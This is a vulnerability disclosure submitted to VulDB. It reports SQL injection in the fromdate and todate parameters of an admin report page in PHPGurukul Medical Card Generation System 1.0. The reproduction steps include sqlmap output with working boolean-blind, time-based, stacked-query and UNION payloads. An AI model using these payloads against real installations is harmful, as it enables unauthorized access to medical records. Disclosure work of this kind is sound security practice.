Submit #427400: PHPGurukul Medical Card Generation System V1.0 SQL Injectioninfo

Titel	PHPGurukul Medical Card Generation System V1.0 SQL Injection
Beschreibung	I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/card-bwdates-reports-details.php Vulnerable Parameter: 'fromd', 'todate' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to "Report of medical card" 3) Fill the dates 2) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request. 3) Input the payload to invoke the SQL injection. ----------------fromdate------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: fromdate (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: fromdate=2024-10-14' AND 1713=(SELECT (CASE WHEN (1713=1713) THEN 1713 ELSE (SELECT 3406 UNION SELECT 2540) END))-- jbAe&todate=asd&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2024-10-14' AND (SELECT 3141 FROM (SELECT(SLEEP(5)))JDEY)-- aufQ&todate=asd&submit= --- --------------todate---------------- --- Parameter: todate (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: fromdate=2024-10-14&todate=asd' AND 7095=(SELECT (CASE WHEN (7095=7095) THEN 7095 ELSE (SELECT 7312 UNION SELECT 5291) END))-- -&submit= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: fromdate=2024-10-14&todate=asd';SELECT SLEEP(5)#&submit= Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: fromdate=2024-10-14&todate=asd' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x6d67664c4c6952574a43745369714d457476507270416a6f74517667434c5948626774704e736575,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&submit= --- Please let me know if you need further information or a more detailed analysis.
Benutzer	Delvy (UID 74555)
Einreichung	21.10.2024 04:22 (vor 2 Jahren)
Moderieren	23.10.2024 13:05 (2 days later)
Status	Akzeptiert
VulDB Eintrag	281563 [PHPGurukul Medical Card Generation System 1.0 Report of Medical Card Page card-bwdates-reports-details.php fromdate/todate SQL Injection]
Punkte	17

◂ Zurück Übersicht Weiter ▸

Do you know our Splunk app?

Download it now for free!